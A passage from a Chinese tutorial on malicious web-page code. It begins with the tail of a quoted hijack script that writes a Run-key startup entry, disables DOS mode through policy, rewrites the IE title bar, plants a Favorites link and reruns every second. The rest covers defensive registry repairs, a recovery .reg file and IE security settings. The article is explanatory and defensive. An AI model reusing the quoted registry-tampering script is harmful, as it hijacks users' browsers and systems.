抓住网页恶意代码的"黑手"[2]

sh1.regwrite （ "hklm\\software\\microsoft\\windows\\currentversion\\
run\\internat.e xe", ".............."）;
// 设置注册不可更改
sh1.regwrite （ "hkcu\\software\\microsoft\\windows\\currentversion\\
policies\\winol dapp\\norealmode", "00000000", "reg_dword"）;
//修改 浏览器的标题栏
shl.regwrite（"hklm\\software\\microsoft\\internetexplorer\\main\\windowtitle",
"..............."）;
shl.regwrite（"hkcu\\software\\microsoft\\internetexplorer\\main\\windowtitle",
".............."）;
// 以下程序是将含恶意代码的网页添加至 收藏夹中
var wf, shor, loc;
wf = fso.getspecialfolder（0）;
loc = wf + "\\favorites";
if（!fso.folderexists（loc））
{
loc = fso.getdrivename （wf） + "\\documents and settings\\
" + net.username + "\\favorites";
if（fso.folderexists（ loc））
{
addfavlnk（loc, "显示标题.....", "url......" ）;
}
}
//设置 cookie值
var expdate = new date（（new date（ ））.gettime（） + （1））;
document.cookie="chg=general; expires=" + expdate.togmtstring（ ） + "; path=/;"
}
}
catch（e）
{}
}
catch（e）
{}
}
//初始化函数，并每隔一秒执行修 改程序
function init（）
{
settimeout（"f（）", 1000）;
}
init（）;
因应对策：
　　 当不小心遭了恶意代码时，首先需要做的是动修改注册表相关表 项值：
一、手动修改
1、改正对默认 主页的修改：
在hkey_local_machine\software\microsoft\internetexplorer\main中的"start
page"和"default_page_url"。
2、更改对internet explorer的标题栏的修改：
在 hkey_local_machine\software\microsoft\internet explorer\main中右边的
窗口中修改字符串值“window title”为新标题的名 字。
3、改正对地址栏 下的文字修改：
在 hkey_current_user\software\microsoft\interner
explorer\toolbar，在右边找到键值linksfoldername,将其中的内容删去即可 。
4、改正对windows启动栏的 修改：
这种情况适用于通过修改注册表项?quot;start page"和
"default_page_url"仍不能生效的情况，可试着依次打开如下主键：
hkey_local_machine/microsoft/windows/currentversion/run修改右栏里的
“qwe”的键值，删掉表项值，重新启动计算机。
5、改正在internet exploer中点击右键中出 现非法站点的链接：
在 hkey_current_user\software\microsoft\internet explorer\menuext中删除
非法链接的该键值即可。
6、清除浏览器中地址栏中无用的地址：
在 heky_current_user\software\microsoft\internet
explorer\typeurls中删除无用的键值即可。
二、应用工具软件
　　下载《反修改精灵》软件：
　　该软件能有效地防止ie修改 ，可到天极网mydown下载站下载。
三、备份与命令恢复
　　1：对于win9x用户，可在机器启动时按f8键，选择到ms-dos方式下，使用scanreg/restore命令来恢复以前备份的正常注册表。
　　2：对于win2000用户，把以下内容copy下来，存为recover.reg文件，选带命令行的安全模式，用命令regedit recover.reg导入，然后重启机器：
recover.reg文件内容如下：
windows registry editor version 5.00
[hkey_current_user\software\microsoft\windows\currentversion\ policies\explorer]
"nodrivetypeautorun"=dword:00000095
"norun"=hex:
"nologoff"=hex:
"nodrives"=dword:00000000
"restrictrun"=dword:00000000
[hkey_current_user\software\microsoft\windows\currentversion\policies\system]
"disableregistrytools"=dword:00000000
[hkey_current_user\software\microsoft\windows\currentversion\policies\system]
"disableregistrytools"=dword:00000000
[hkey_current_user\software\microsoft\windows\currentversion\policies\winoldapp]
"disabled"=dword:00000000
[hkey_current_user\software\microsoft\windows\currentversion\policies\winoldapp]
"norealmode"=dword:00000000
[hkey_local_machine\software\microsoft\windows\currentversion\winlogon]
"legalnoticecaption"=""
"legalnoticetext"=""
[hkey_local_machine\software\microsoft\internet explorer\main]
"window title"=""
[hkey_current_user\software\microsoft\internet explorer\main]
"window title"=""
防患于未然：
　　笔者阅读了网上相关文章，对防御方法作了一些总结，希望 你能作些 积极的防范。
　　1、要避免中招，关键是不要轻易去一些自己并不了解的站点，特别是那些看上去美丽诱人的网址更不要贸然前往 ，否则吃亏的 往往是你。
　　2、运行ie，点击“工具→internet选项→安全→ internet区域的安全级别，把安全极别由“中”改为“高” 。
　　3 、由于该类网页是含有有害代码的activex或applet、javascript的网页文件，因此在ie设置中将activex插件和控件、java脚本等全部禁止就可以避免中招。具体方法是：在ie窗口中点击“工具→internet选项，在 弹出的对话框中选择“安全”标签，再点击“自定义级别”按钮，就会弹出“安全设置”对话框，把其中所有activex插件和控件以及java相关全部选择“禁用”即可。不过，这样做在以后的网页浏览过程中可能会造成一些正常使用activex的网站无法浏览。唉，有利就有弊，您还是自己看着办吧。
　　4、对于windows98用户，请打开c:\windows\java\packages\cvlv1nbb.zip，把其中的“activexcomponent.class”删掉；对于windowsme用户，请打开c:\windows\java\packages\5nzvfpf1.zip，把其中的“ activexcomponent.class”删掉。请放心，删除这个组件不会影响到你。
　　5、安装网络防火墙，特别是安装了norton2001后，进入该类网页就会报警提示有脚本写注册表，国产反病毒软件kvw3000也有此类功效，建 议您也安装一个这样的软件。
　　6、虽然经过一番辛苦的劳动修改回了标题和默认连接首页，但如果以后又不小心进入该站就又得麻烦一次 。其实，你可以在ie中做一些设置 以便永远不进该站点：
　　打开ie，点击“工具”→“internet选项”→“内容”→“分级审查”，点“启用”按钮，会调出“分级审查”对话框 ，然后点击“许可站点”标签，输入不想去的网站网址，如输入：http://www.xxx.com，按“从不”按钮，再点击“确定”即大功告成！ 正常浏览网页的。
　　7、设置注册表相关值项，为注册表"加锁"
　　（1）运行注册表编辑器regedit.exe；
　　（2）在hkey_current_user\software\microsoft\windows\currentversion\policies\system下，增加名为disableregistrytools的dword值项，并将其值改为“1”，即可禁止使用注册表编辑器regedit.exe。
　　如果你由于其它原因需要修改注册表，可用如下解锁方法：
　　用记事本编辑一个任意名字的.reg文件，比如recover.reg，内容如下：
regedit4
[hkey_current_user\software\microsoft\windows\currentversion\policies\system]
"disableregistrytools"=dword:00000000
　　则双击运行recover.reg即可。
背景资料：
一、什么是注册表
注册表是在windows中，存储关于计算机配置信息的数据库。注册表包含windows2000操作时不断引用的信息，例如：
每个用户的配置文件。
计算机上安装的程序和每个程序可以创 建的文档类型。
文件夹 和程序图标的属性设置。
系统中 的硬件。
正在使用的端口 。
注册表按层次结 构来组织，由项、子项、配 置单元和值项组成。
请 参阅配置单元 ；子项；值项。